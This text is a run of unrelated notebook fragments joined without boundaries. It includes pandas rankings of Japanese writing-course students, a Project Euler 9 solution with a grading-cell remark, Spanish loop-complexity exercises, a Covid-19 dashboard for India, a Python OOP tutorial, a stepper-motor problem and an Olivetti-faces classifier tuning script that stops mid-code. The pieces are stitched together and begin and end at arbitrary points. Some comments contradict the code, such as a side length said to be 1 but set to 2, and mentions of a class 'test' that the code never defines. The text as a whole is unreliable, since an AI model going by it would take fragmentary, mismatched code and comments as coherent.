[(student_synopses.characters_ave <= 1200) & (student_synopses.submitted_count >= 5)] \ [['name', 'submitted_count', 'characters_ave']] \ .sort_values(by='characters_ave')文字数超過ワースト5 逆に、文字数制限を一切守る気のない、平均文字数のもっとも大きい人たちは次のとおりである。student_synopses[student_synopses.submitted_count >= 2][['name', 'submitted_count', 'characters_ave']] \ .sort_values(by='characters_ave', ascending=False).head()梗概選出回数 3回以上梗概を選出されたのは5人、うち4回選出されたのは斧田 小夜さん1人だった。student_synopses[student_synopses.selected_count >= 3][['name', 'selected_count']] \ .sort_values(by='selected_count', ascending=False)梗概選出率 しかし、梗概選出回数を提出回数で割った「梗概選出率」でみると、1位は私になる。 「受講生勝手にランキング」などと言いながら、これがやりたかっただけである。 ちなみに、選出実作1編あたりの得点でランキングをつくった場合は、私がワースト1位になってしまう。selected_rate = (student_synopses.selected_count / student_synopses.submitted_count).fillna(0) selected_rate.name = 'selected_rate' pd.concat([student_synopses, selected_rate], axis=1)\ [['name', 'submitted_count', 'selected_count', 'selected_rate']] \ .sort_values(by='selected_rate', ascending=False).head()実作 つぎは、実作に関するランキングをみていこう。 データとして用いるのは以下の表である。student_works実作提出回数 実作提出回数トップ5は次のとおりである。 斧田さんは実作も皆勤賞だった。student_works[student_works.submitted_count >= 7][['name', 'submitted_count']] \ .sort_values(by='submitted_count', ascending=False)自主提出得点 点数の入りにくい自主提出の得点だけでランキングすると、トップ5は次のようになる。 ここでも斧田さんが1位。student_works[student_works.optional_score >= 3][['name', 'optional_score']] \ .sort_values(by='optional_score', ascending=False)実作総文字数 最後に、実作の総文字数トップ5である。 当然斧田さんが1位。だんとつの20万字である。student_works[['name', 'characters_sum']].sort_values(by='characters_sum', ascending=False).head()Project Euler: Problem 9 https://projecteuler.net/problem=9A Pythagorean triplet is a set of three natural numbers, $a < b < c$, for which,$$a^2 + b^2 = c^2$$For example, $3^2 + 4^2 = 9 + 16 = 25 = 5^2$.There exists exactly one Pythagorean triplet for which $a + b + c = 1000$. Find the product abc.def Euler_9(n): for i in range(1,n,1): for j in range(1,n-i,1): k = n-i-j if i**2+j**2==k**2: return i*j*k return 0 def Euler_9(n): for i in range(1,n,1): for j in range(1,n-i,1): k = n-i-j if i**2+j**2==k**2: return i*j*k return 0 x = Euler_9(1000) print(x) """Answer prints itself below""" # This cell will be used for grading, leave it at the end of the notebook.def ejemplo11( n ): count = 0 i = n while i > 1 : count += 1 i = i // 2 return count print(ejemplo11(16)) # T(n) = 2 + (2 Log 2 n) def ejemplo13( x ): bandera = x contador = 0 while( bandera >= 10): print(f" x = { bandera } ") bandera /= 10 contador = contador + 1 print(contador) # T(x) = log10 x +1 ejemplo13( 1000 ) def ejemplo14( n ): y = n z = n contador = 0 while y >= 3: #3 y /= 3 # 1 contador += 1 # cont =3 while z >= 3: #27 z /= 3 contador += 1 return contador print(ejemplo14( 27 )) def ejemplo15( n ): contador = 0 for i in range( n ) : for j in range( n ) : contador += 1 while n > 1 : contador += 1 n /= 2 return contador print(ejemplo15(10))"Dynamic Covid-19 Tracker"- badges: false- author: Hello!, This is a dynamic version of the dashboard, it updates once daily! Data source is https://www.covid19india.org/#collapse from datetime import datetime import pandas as pd import numpy as np import requests import json import matplotlib.pyplot as plt import matplotlib.dates as mdates import matplotlib as mpl from IPython.core.display import display,HTML import pytz %matplotlib inline dynamic_df = pd.read_csv("https://api.covid19india.org/csv/latest/state_wise_daily.csv") dynamic_df.head() ddf = dynamic_df[(dynamic_df.Status == "Confirmed")] ddf ddf1 = ddf.drop(columns = ["Status"]) ddf2 = dynamic_df[(dynamic_df.Status == "Deceased")] ddf2 = ddf2.drop(columns = ["Status"]) ddf1["Date"] = ddf1["Date"].astype('datetime64[ns]') update = dynamic_df.iloc[-1,0] cases = ddf1.TT.sum() new = ddf1.iloc[-1,1] deaths = ddf2.TT.sum() dnew = ddf2.iloc[-1,1] overview = '''

India

Last update: {update}

Confirmed cases:

{cases} (+{new})

Confirmed deaths:

{deaths} (+{dnew})

''' html = HTML(overview.format(update=update, cases=cases,new=new,deaths=deaths,dnew=dnew)) display(html) #hide_input tz = pytz.timezone('Asia/Kolkata') #now = datetime.now().time() # time object now = datetime.now() now = now.astimezone(tz) print("This dashboard is last updated at (IST) =", now.strftime("%Y-%m-%d %H:%M")) #collapse ch_total = ddf1.CH.sum() ch_new = ddf1.iloc[-1,7] mh_total = ddf1.MH.sum() mh_new = ddf1.iloc[-1,23] dl_total = ddf1.DL.sum() dl_new = ddf1.iloc[-1,11] firstdata = '''

--Important Places--

Total Cases (New Cases)

Chandigarh (Hometown): {ch_total} (+{ch_new})

Delhi (Second Home): {dl_total} (+{dl_new})

Maharashtra (Just Because..): {mh_total} (+{mh_new})

''' html = HTML(firstdata.format(ch_total=ch_total, ch_new = ch_new, mh_total = mh_total, mh_new = mh_new, dl_total = dl_total, dl_new = dl_new )) display(html) #collapse n = 10 st = ["TT", "MH", "TN", "DL", "KA", "UP", "BR", "WB", "TG", "CH"] st_name = ["Daily Count for India", "Maharashta", "Tamil Nadu", "Delhi", "Karnataka", "Uttar Pradesh", "Bihar", "West Bengal", "Telangana", "Chandigarh (My hometown)"] ax = [] fig = plt.figure(figsize = (16,30)) gs = fig.add_gridspec(n, 3) for i in range(n): ax1 = fig.add_subplot(gs[i, :]) ax1.bar(ddf1.Date,ddf1[st[i]],alpha=0.3,color='#007acc') ax1.plot(ddf1.Date,ddf1[st[i]] , marker="o", color='#007acc') ax1.xaxis.set_major_locator(mdates.WeekdayLocator()) ax1.xaxis.set_major_formatter(mdates.DateFormatter('%b %d')) ax1.text(0.02, 0.5,st_name[i], transform = ax1.transAxes, fontsize=25) ax1.spines['right'].set_visible(False) ax1.spines['top'].set_visible(False)Object-Oriented Programming Introduction After you have been coding for a little bit of time, you may come across some people talking about **object-oriented programming** or **OOP** for short. This could be accompanied by scary words like "inheritance", "overloading", and "children" too. But never fear, for not only is OOP a useful coding paradigm, but it is also incredibly easy to implement in python.For this session I am assuming that you are working in Python 3, however I don't believe many of the basics have changed since Python 2, nonetheless it's worthwhile learning the version that isn't over 20 years old... What is OOP? Put simply, object-oriented programming is a way of thinking about programming outside of the classic "run this function on this variable" style. Instead we can think of the data we are considering as an **object**.This object could have properties and things that the object can do. In python we refer to an object as a `class`, with the properties called `attributes` and the things it can do referred to as `methods`.You can think of a `class` as a template for an object, so if you consider the thing you are sitting on, it is a chair. More specifically it is *that particular chair you are sitting on*. In that vein, you are sitting on an *instance* of class `chair`.Other people will have different instances of class `chair`, and each instance is unique, with its own property values. If you cut the leg off your chair, it does not remove a leg from everybody else's chair, just decreses the leg count of your chair by 1.If that all sounds a bit abstract, don't worry. It is. But the vocabulary above will be used throughout and should help you grasp the concepts as we go. Our first `class` Let's build our first class. First open a new file called `OOP.py`.To make a class in python we use the `class` keyword.To define a method of a class, you simply make a function within the class definition, but it does need a special argument called `self`. We will come to why that is in a little bit.To define attributes of a class we assign values to `self.x` for any given attribute `x`.Defining a class is not good enough on its own though. We also need to define a method of the class called `__init__()`. This method is run when you create an instance of a class, and generates the properties of the *instance*.Here is the skeleton for creating our first class, the class for a square:class square: # Create class "test" def __init__(self): # Define init method self.side_length = 2 # Set side_length to the value 1Now we have created our class, we can make an instance of the class `test`. Let's call that `instance1`.square1 = square()So now we have the instance assigned to the name `instance1`, we can check that attribute `property1` by writing `instance.property`.square1.side_lengthWe can manipulate this attribute directly if we want like a normal variable.square1.side_length = 4 square1.side_lengthIn fact it is like a normal variable in every way except that it is encapsulated in this class.Notice how we cannot access attributes which are not there...square1.areaHowever we can assign into attributes that were not made when the instance was first defined.square1.area = square1.side_length ** 2 square1.areaRectangles and arguments Now let's define a slightly more complicated class for a rectangle. This rectangle can be of arbitrary dimensions `x`, `y`. These dimensions will be specified when creating an instance of the object (also known as *instantiating* the object).To handle this, we need to add a few arguments to the `__init__()` method.class rectangle: def __init__(self, x, y): # x and y are arguments of the init method self.x = x self.y = yNow let's create a 4x3 rectangle:rectangle1 = rectangle(4,3) rectangle1.x rectangle1.yNow to find the area, we can just calculate it outside the instance, and assign it to a new attribute as follows:rectangle1.area = rectangle1.x * rectangle1.y rectangle1.areaBut this is an operation we might want to do to each rectangle. So what do we do when something is repeatedly needed? We turn it into a function. Specifically here we are going to make a `method` of the object.A `method` is special in that it takes the argument `self` as its first argument. This value `self` refers to the instance that the method belongs to.So let's define a method to calculate the area of an object of class rectangle:class rectangle: def __init__(self, x, y): self.x = x self.y = y self.area = 0 # It is usually safest to create the attribute first with a dummy value. def calc_area(self): self.area = self.x * self.ySo now we can instantiate the new rectangle as before, and then use the method to calculate the area automatically by calling `rectangle.calc_area()`. The brackets here are important as remember `calc_area()` is basically just a *function*.rectangle2 = rectangle(4,3) rectangle2.areaOops, we forgot to run `calc_area()`, so the area value is just the default we set. Let's change that.rectangle2.calc_area() rectangle2.areaPerfect. But that was annoying. We know what the area will be once we instantiate the rectangle with values for the sides, so is there some way to save some time?As a little trick, we can call other methods in the `__init__()` method to make them run as soon as we instantiate the object, like so:class rectangle: def __init__(self, x, y): self.x = x self.y = y self.calc_area() # Run the method calc_area() of the object immediately def calc_area(self): self.area = self.x * self.y rectangle3 = rectangle(4,3) rectangle3.areaChallenge 1Make a class `circle` that takes the radius of a circle as an argument at instantiation, and calculates its area and circumference automatically. A more useful example To understand OOP, it is useful to have a more concrete example to work with, so let us think about chairs.Here's a chair class:class chair: def __init__(self, legs, height, colour): self.legs = legs self.height = height self.colour = colour def paint(self, newcolour): # A new method! Notice how it can take extra arguments aside from self self.colour = newcolour`chair1` is a very typical chair with 4 legs, is 0.8m tall, and is coloured green.chair1 = chair(4, 0.8, "green") chair1.legs chair1.height chair1.colourNow let's use the `paint()` method of the chair class to repaint the chair a different colourchair1.paint("purple") chair1.colourChallenge 2Modify the chair class to make the height adjustable by certain amounts using the `raise()` and `lower()` methods.**NOTE: There are some heights that are not reasonable, it might be best to check that the height is within reasonable bounds** Passing around objects An object can be passed around just like any other data. You can pack it into lists, put it in dictionaries, even pass it into functions.Let's create a function that works on chair objects.def saw_leg(c): if c.legs > 0: # A chair cannot have fewer than 0 legs c.legs = c.legs - 1 print(chair1.legs) saw_leg(chair1) print(chair1.legs)2 1Notice how even though we didn't return the chair object at the end of the function, it *still* affected the chair object.**This is something to be very careful of!**An object name in python is essentially just a pointer to where the object is in memory. If you do things to that pointer in a function, it can affect the object directly!In general it is good practice when working with functions that manipulate objects to return the object at the end. This means the function behaves as expected, which is what we should always be striving for when programming: predictibility.def saw_leg(c): if c.legs > 0: c.legs = c.legs - 1 return c chair1 = saw_leg(chair1) chair1.legsAs stated above we could make a list of chairs too.import random chair_stack = [] for x in range(10): # Make 10 green chairs with random numbers of legs and random heights chair_stack.append(chair(random.randint(1, 10), random.random()*2, "green")) for c in chair_stack: print(c.legs)5 8 10 8 9 10 8 2 1 4We can manipulate this as we would a list of any other thing. Here's a list comprehension that saws a leg off each chair if we can.chair_stack = [saw_leg(c) for c in chair_stack] for c in chair_stack: print(c.legs)4 7 9 7 8 9 7 1 0 3OOP in biology In biology, our data are often comprised of samples of individuals. If we know the attributes of the individuals that we are measuring, we can write a class that will handle each individual as a seperate instance.from math import pi class spider: def __init__(self, body_weight, web_diameter_horizontal, web_diameter_vertical, hub_diameter, mesh_width): self.bw = body_weight self.dh = web_diameter_horizontal self.dv = web_diameter_vertical self.h = hub_diameter self.mw = mesh_width self.calc_ca() def calc_ca(self): # Calculate capture area using Ellipse-Hub formula self.ca = ((self.dv/2)*(self.dh/2)*pi) - ((self.h/2)*pi) spidey1 = spider(1, 10, 8, 3, 1.4) print(spidey1.ca)58.119464091411174Excercises Electric Machinery Fundamentals Chapter 9 Problem 9-8%pylab inlinePopulating the interactive namespace from numpy and matplotlibDescription For a particular application, a three-phase stepper motor must be capable of stepping in 10° increments.How many poles must it have?theta_e = 60/180*pi # [rad] theta_m = 10/180*pi # [rad]SOLUTION From Equation (9-18), the relationship between mechanical angle and electrical angle in athree-phase stepper motor is:$$\theta_m = \frac{2}{p}\theta_e$$p = 2* theta_e/theta_m print(''' p = {:.0f} poles ============'''.format(p))p = 12 poles ============Part I Projectimport numpy as np import matplotlib as mpl import matplotlib.pyplot as plt import pandas as pd from sklearn.datasets import fetch_olivetti_faces %matplotlib inlineFetch, Preview, and Explore the DataX, y = fetch_olivetti_faces(return_X_y=True) def inspect_data(X, y, show_data=False): print("Data X shape: ", X.shape) print("Labels y shape: ", y.shape) if show_data: print("Dataset X:\n", X) print("Labels y: \n", y) def preview_faces(X, num_of_images_divided_by_2): plt.figure(figsize=(15, 10)) counter = 0 shuffled_idx = np.random.permutation(len(X)) X_copy = X.copy() for index, X_image in enumerate(X_copy[shuffled_idx]): plt.subplot(num_of_images_divided_by_2 // 10, 5, index + 1) plt.imshow(X_image.reshape(64, 64), cmap="gray") plt.axis('off') if (counter == num_of_images_divided_by_2/2 - 1): break counter += 1 plt.show() preview_faces(X, 50)Data Preprocessing# Methods: # most promising: Dimensionality Reduction/Feature Removals # things to test out: # PCA/IPCA/kPCA/MDS/Isomap/LDA/t-SNE/LLE/Random Proj. # KMeans, DBSCAN, Agglomerative, Spectral, Mean-shift, affinity prop, BIRCH # Classifiers: # Softmax/SGD/SVC/LinearSVC/DT/Ensemble/KNeighbors from sklearn.model_selection import train_test_split, StratifiedShuffleSplit from sklearn.model_selection import GridSearchCV, RandomizedSearchCV from sklearn.model_selection import cross_val_score, cross_val_predict, learning_curve, validation_curve from sklearn.pipeline import Pipeline from sklearn.metrics import f1_score, accuracy_score, precision_score, recall_score, roc_auc_score, precision_recall_curve, roc_curve from sklearn.decomposition import PCA, IncrementalPCA, KernelPCA from sklearn.manifold import TSNE, LocallyLinearEmbedding, MDS, Isomap from sklearn.discriminant_analysis import LinearDiscriminantAnalysis from sklearn.random_projection import GaussianRandomProjection, SparseRandomProjection from sklearn.cluster import KMeans, DBSCAN, AffinityPropagation, AgglomerativeClustering, Birch, MeanShift, SpectralClustering from sklearn.mixture import GaussianMixture, BayesianGaussianMixture from sklearn.linear_model import LogisticRegression, SGDClassifier from sklearn.svm import LinearSVC, SVC from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier, ExtraTreesClassifier, AdaBoostClassifier, VotingClassifier, StackingClassifier, BaggingClassifier from sklearn.neighbors import KNeighborsClassifier from sklearn.neural_network import MLPClassifier from xgboost import XGBClassifier inspect_data(X, y, True) # splitting the data olivetti = fetch_olivetti_faces() strat_split = StratifiedShuffleSplit(n_splits=1, test_size=40, random_state=42) train_valid_idx, test_idx = next(strat_split.split(olivetti.data, olivetti.target)) X_train_valid = olivetti.data[train_valid_idx] y_train_valid = olivetti.target[train_valid_idx] X_test = olivetti.data[test_idx] y_test = olivetti.target[test_idx] strat_split = StratifiedShuffleSplit(n_splits=1, test_size=80, random_state=43) train_idx, valid_idx = next(strat_split.split(X_train_valid, y_train_valid)) X_train = X_train_valid[train_idx] y_train = y_train_valid[train_idx] X_valid = X_train_valid[valid_idx] y_valid = y_train_valid[valid_idx] inspect_data(X_train, y_train) inspect_data(X_valid, y_valid) inspect_data(X_test, y_test) log_reg = LogisticRegression() sgd_clf = SGDClassifier() lin_svc = LinearSVC() svc = SVC() tree_clf = DecisionTreeClassifier() rnd_forest_clf = RandomForestClassifier() extra_trees_clf = ExtraTreesClassifier() adaboost_clf = AdaBoostClassifier() # gradientboost_clf = GradientBoostingClassifier() bagging_clf = BaggingClassifier() neighbors_clf = KNeighborsClassifier() mlp_clf = MLPClassifier() classifiers = (log_reg, sgd_clf, lin_svc, svc, tree_clf, rnd_forest_clf, extra_trees_clf, adaboost_clf, # gradientboost_clf, bagging_clf, neighbors_clf, mlp_clf) xgboost_clf = XGBClassifier() # voting_clf = VotingClassifier() # stacking_clf = StackingClassifier() shortlist_models = False if shortlist_models: accuracy = [] for classifier in classifiers: classifier_accuracy = cross_val_score(classifier, X_train, y_train, scoring="accuracy", cv=5, n_jobs=-1, verbose=2) print(str(classifier)) accuracy.append((str(classifier), classifier_accuracy)) # accuracy # mean_median_scores = [] # for classifier, scores in accuracy: # mean_median_scores.append((str(classifier), np.mean(scores), np.median(scores))) # mean_median_scores # LogisticRegression # LinearSVC # RandomForestClassifier # ExtraTreesClassifier # LogisticRegression # 1st searchCV run_GridSearchCV1_log_reg = False if run_GridSearchCV1_log_reg: param_grid_log_reg = [{"penalty": ["l1", "l2", "elasticnet", None], "tol": [1e-0, 1e-1, 1e-2, 1e-3, 1e-4], "C": [1.0, 10.0, 100.0], "l1_ratio": np.round(np.linspace(0, 1, 10), 1)} ] grid_cv_log_reg = GridSearchCV(log_reg, param_grid_log_reg, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_log_reg.fit(X_train, y_train) # grid_cv.best_params_ best_params_log_reg1 = {'C': 10.0, 'l1_ratio': 0.0, 'penalty': 'l2', 'tol': 0.01} # 2nd searchCV run_GridSearchCV2_log_reg = False if run_GridSearchCV2_log_reg: param_grid_log_reg = [{"tol": np.linspace(0.01, 0.1, 10), "C": [10.0, 32, 55.0]} ] grid_cv_log_reg = GridSearchCV(LogisticRegression(**best_params_log_reg1), param_grid_log_reg, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_log_reg.fit(X_train, y_train) # grid_cv_log_reg.best_params_ best_params_log_reg2 = {'C': 10.0, 'penalty': 'l2', 'tol': 0.01} log_reg_optimized = LogisticRegression(**best_params_log_reg2) log_reg_optimized.fit(X_train, y_train) log_reg_pred = log_reg_optimized.predict(X_valid) print(accuracy_score(y_valid, log_reg_pred)) # 96.25% # LinearSVC # 1st searchCV run_GridSearchCV1_lin_svc = False if run_GridSearchCV1_lin_svc: param_grid_lin_svc = [{"penalty": ["l1", "l2"], "loss": ["hinge", "squared_hinge"], "tol": [1e-0, 1e-1, 1e-2, 1e-3, 1e-4], "C": [1.0, 10.0, 100.0]} ] grid_cv_lin_svc = GridSearchCV(lin_svc, param_grid_lin_svc, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_lin_svc.fit(X_train, y_train) # grid_cv_lin_svc.best_params_ best_params_lin_svc1 = {'C': 10.0, 'loss': 'squared_hinge', 'penalty': 'l2', 'tol': 0.001} # 2nd searchCV run_GridSearchCV2_lin_svc = False if run_GridSearchCV2_lin_svc: param_grid_lin_svc = [{"tol": np.linspace(0.001, 0.01, 10), "C": [10.0, 32, 55.0]} ] grid_cv_lin_svc = GridSearchCV(LinearSVC(**best_params_lin_svc1), param_grid_lin_svc, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_lin_svc.fit(X_train, y_train) # grid_cv_lin_svc.best_params_ best_params_lin_svc2 = {'C': 10.0, 'tol': 0.004, 'loss': 'squared_hinge', 'penalty': 'l2'} # 3rd searchCV run_GridSearchCV3_lin_svc = False if run_GridSearchCV3_lin_svc: param_grid_lin_svc = [{"tol": np.linspace(0.004, 0.005, 11)}] grid_cv_lin_svc = GridSearchCV(LinearSVC(**best_params_lin_svc2), param_grid_lin_svc, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_lin_svc.fit(X_train, y_train) # grid_cv_lin_svc.best_params_ best_params_lin_svc3 = {'C': 10.0, 'tol': 0.004, 'loss': 'squared_hinge', 'penalty': 'l2'} lin_svc_optimized = LinearSVC(**best_params_lin_svc3) lin_svc_optimized.fit(X_train, y_train) lin_svc_pred = lin_svc_optimized.predict(X_valid) print(accuracy_score(y_valid, lin_svc_pred)) # 97.50% # RandomForestClassifier # 1st searchCV run_GridSearchCV1_rnd_clf = False if run_GridSearchCV1_rnd_clf: param_grid_rnd_clf = [{"n_estimators": [50, 100, 150, 200, 250, 300], "criterion": ["gini", "entropy"], "max_depth": [10, 100, 1000, None], "min_samples_split": [2, 4, 6, 8, 10]} ] grid_cv_rnd_clf = GridSearchCV(rnd_forest_clf, param_grid_rnd_clf, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_rnd_clf.fit(X_train, y_train) # grid_cv_rnd_clf.best_params_ best_params_rnd_clf1 = {'criterion': 'gini', 'max_depth': None, 'min_samples_split': 4, 'n_estimators': 300} # 2nd searchCV run_GridSearchCV2_rnd_clf = False if run_GridSearchCV2_rnd_clf: param_grid_rnd_clf = [{"n_estimators": [300, 400, 500, 600, 700, 800], "min_samples_split": [2, 3, 4, 5, 6], "min_samples_leaf": [1, 5, 10, 20, 30, 50], # "max_features": ["auto", "sqrt", "log2", None], # "max_leaf_nodes": [10, 20, 50, None], # "bootstrap": [True, False], # "max_samples": [None, *np.linspace(0, 1, 11)[1:10]] } ] grid_cv_rnd_clf = GridSearchCV(RandomForestClassifier(**best_params_rnd_clf1), param_grid_rnd_clf, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_rnd_clf.fit(X_train, y_train) # grid_cv_rnd_clf.best_params_ best_params_rnd_clf2 = {'min_samples_leaf': 1, 'min_samples_split': 4, 'n_estimators': 600, 'criterion': 'gini', 'max_depth': None} # 3rd searchCV run_GridSearchCV3_rnd_clf = False if run_GridSearchCV3_rnd_clf: param_grid_rnd_clf = [{ "max_features": ["auto", "sqrt", "log2", None], "max_leaf_nodes": [10, 20, 50, None], "bootstrap": [True, False], # "max_samples": [None, *np.round(np.linspace(0, 1, 11)[1:10], 3)] } ] grid_cv_rnd_clf = GridSearchCV(RandomForestClassifier(**best_params_rnd_clf2), param_grid_rnd_clf, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_rnd_clf.fit(X_train, y_train) # grid_cv_rnd_clf.best_params_ best_params_rnd_clf3 = {'bootstrap': True, 'max_features': 'auto', 'max_leaf_nodes': 50, 'min_samples_leaf': 1, 'min_samples_split': 4, 'n_estimators': 600, 'criterion': 'gini', 'max_depth': None} rnd_clf_optimized = RandomForestClassifier(**best_params_rnd_clf3) rnd_clf_optimized.fit(X_train, y_train) rnd_clf_optimized_pred = rnd_clf_optimized.predict(X_valid) print(accuracy_score(y_valid, rnd_clf_optimized_pred)) # ExtraTreesClassifier # 1st searchCV run_GridSearchCV1_extra_trees_clf = False if run_GridSearchCV1_extra_trees_clf: param_grid_extra_trees_clf = [{"n_estimators": [50, 100, 150, 200, 250, 300], "criterion": ["gini", "entropy"], "max_depth": [10, 100, 1000, None], # "min_samples_split": [2, 4, 6, 8, 10] } ] grid_cv_extra_trees_clf = GridSearchCV(extra_trees_clf, param_grid_extra_trees_clf, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_extra_trees_clf.fit(X_train, y_train) # grid_cv_extra_trees_clf.best_params_ best_params_extra_trees_clf1 = {'criterion': 'gini', 'max_depth': 100, 'n_estimators': 300} # 2nd searchCV run_GridSearchCV2_extra_trees_clf = False if run_GridSearchCV2_extra_trees_clf: param_grid_extra_trees_clf = [{"n_estimators": [275, 300, 325, 350, 375, 400], "min_samples_split": [2, 4, 6, 8, 10] } ] grid_cv_extra_trees_clf = GridSearchCV(ExtraTreesClassifier(**best_params_extra_trees_clf1), param_grid_extra_trees_clf, cv=5, scoring="accuracy", n_jobs=-1, verbose=2) grid_cv_extra_trees_clf.fit(X_train, y_train) # grid_cv_extra_trees_clf.best_params_ best_params_extra_trees_clf2 = {'min_samples_split': 6, 'n_estimators': 300, 'criterion': 'gini', 'max_depth': 100, } extra_trees_clf_optimized = ExtraTreesClassifier(**best_params_extra_trees_clf2) extra_trees_clf_optimized.fit(X_train, y_train) extra_trees_clf_optimized_pred = extra_trees_clf_optimized.predict(X_valid) print(accuracy_score(y_valid, extra_trees_clf_optimized_pred)) extra_trees_clf_optimized = ExtraTreesClassifier(max_depth=100, min_samples_split= 6, n_estimators= 300) extra_trees_clf_optimized.fit(X_train, y_train) extra_trees_clf_optimized_pred = extra_trees_clf_optimized.predict(X_valid) print(accuracy_score(y_valid, extra_trees_clf_optimized_pred)) feature_importances = pd.Series(grid_cv_extra_trees_clf.best_estimator_.feature_importances_) feature_importances.nlargest(500) # Testing XGBClassifier xgb_classifier = XGBClassifier() xgb_accuracy = cross_val_score(xgb_classifier, X_train, y_train, scoring="accuracy", cv=5, n_jobs=-1, verbose=2) xgb_accuracy[Parallel(n_jobs=-1)]: Using backend LokyBackend with 8 concurrent workers. [Parallel(n_jobs=-1)]: Done 2 out of 5 | elapsed: 46.0s remaining: 1.2min [Parallel(n_jobs=-1)]: Done 5 out of 5 | elapsed: 46.3s remaining: 0.0s [Parallel(n_jobs=-1)]: Done 5 out of 5 | elapsed: 46.3s finished+ **testing dataset size**# Experimenting with Dataset Size X_train_exp, X_test_exp, y_train_exp, y_test_exp = train_test_split(X, y, random_state=12, test_size=0.2) lin_svc_optimized_exp = LinearSVC(**best_params_lin_svc3) lin_svc_optimized_exp.fit(X_train_exp, y_train_exp) lin_svc_optimized_exp_pred = lin_svc_optimized_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, lin_svc_optimized_exp_pred)) extra_trees_clf_exp = ExtraTreesClassifier(**best_params_extra_trees_clf2) extra_trees_clf_exp.fit(X_train_exp, y_train_exp) extra_trees_clf_exp_pred = extra_trees_clf_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, extra_trees_clf_exp_pred)) extra_trees_clf_exp = ExtraTreesClassifier(**best_params_rnd_clf3) extra_trees_clf_exp.fit(X_train_exp, y_train_exp) extra_trees_clf_exp_pred = extra_trees_clf_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, extra_trees_clf_exp_pred)) log_reg_exp = LogisticRegression(**best_params_log_reg2) log_reg_exp.fit(X_train_exp, y_train_exp) log_reg_exp_pred = log_reg_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, log_reg_exp_pred)) random_forest_exp = RandomForestClassifier(**best_params_rnd_clf3) random_forest_exp.fit(X_train_exp, y_train_exp) random_forest_exp_pred = random_forest_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, random_forest_exp_pred)) random_forest_exp = RandomForestClassifier(**best_params_extra_trees_clf2) random_forest_exp.fit(X_train_exp, y_train_exp) random_forest_exp_pred = random_forest_exp.predict(X_test_exp) print(accuracy_score(y_test_exp, random_forest_exp_pred))0.9375+ **Using DR (Clustering)** KMeans, ~~DBSCAN~~, ~~AffinityPropagation~~, ~~AgglomerativeClustering~~, Birch, ~~MeanShift~~, ~~SpectralClustering~~~~GaussianMixture~~, ~~BayesianGaussianMixture~~def DR_pipeline(model, DR_algorithm): return Pipeline([ ("DR_algo", DR_algorithm), ("model", model) ]) def DR_pipeline_accuracy_calculator(pipeline, features=X_train, labels=y_train): pipeline.fit(features, labels) pipeline_predictions = pipeline.predict(X_valid) return accuracy_score(y_valid, pipeline_predictions) # log reg log_reg_KMeans_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), KMeans()) print(DR_pipeline_accuracy_calculator(log_reg_KMeans_pipeline)) log_reg_BIRCH_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), Birch()) print(DR_pipeline_accuracy_calculator(log_reg_BIRCH_pipeline)) # lin svc lin_svc_KMeans_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), KMeans()) print(DR_pipeline_accuracy_calculator(lin_svc_KMeans_pipeline)) lin_svc_BIRCH_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), Birch()) print(DR_pipeline_accuracy_calculator(lin_svc_BIRCH_pipeline)) # rnd clf rnd_clf_KMeans_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), KMeans()) print(DR_pipeline_accuracy_calculator(rnd_clf_KMeans_pipeline)) rnd_clf_BIRCH_pipeline = DR_pipeline(RandomForestClassifier(**best_params_rnd_clf3), Birch()) print(DR_pipeline_accuracy_calculator(rnd_clf_BIRCH_pipeline)) # extra trees extra_trees_clf_KMeans_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), KMeans()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_KMeans_pipeline)) extra_trees_clf_BIRCH_pipeline = DR_pipeline(ExtraTreesClassifier(**best_params_extra_trees_clf2), Birch()) print(DR_pipeline_accuracy_calculator(extra_trees_clf_BIRCH_pipeline))0.825+ **Using DR (DR Techniques)** PCA, ~~IncrementalPCA~~, KernelPCA~~TSNE~~, LocallyLinearEmbedding, ~~MDS~~, IsomapLinearDiscriminantAnalysis~~GaussianRandomProjection~~, ~~SparseRandomProjection~~# log reg log_reg_PCA_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), PCA()) print(DR_pipeline_accuracy_calculator(log_reg_PCA_pipeline)) log_reg_KernelPCA_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), KernelPCA()) print(DR_pipeline_accuracy_calculator(log_reg_KernelPCA_pipeline)) log_reg_LLE_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), LocallyLinearEmbedding()) print(DR_pipeline_accuracy_calculator(log_reg_LLE_pipeline)) log_reg_Isomap_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), Isomap()) print(DR_pipeline_accuracy_calculator(log_reg_Isomap_pipeline)) log_reg_LDA_pipeline = DR_pipeline(LogisticRegression(**best_params_log_reg2), LinearDiscriminantAnalysis()) print(DR_pipeline_accuracy_calculator(log_reg_LDA_pipeline)) # lin svc lin_svc_PCA_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), PCA()) print(DR_pipeline_accuracy_calculator(lin_svc_PCA_pipeline)) lin_svc_KernelPCA_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), KernelPCA()) print(DR_pipeline_accuracy_calculator(lin_svc_KernelPCA_pipeline)) lin_svc_LLE_pipeline = DR_pipeline(LinearSVC(**best_params_lin_svc3), LocallyLinearEmbedding()) 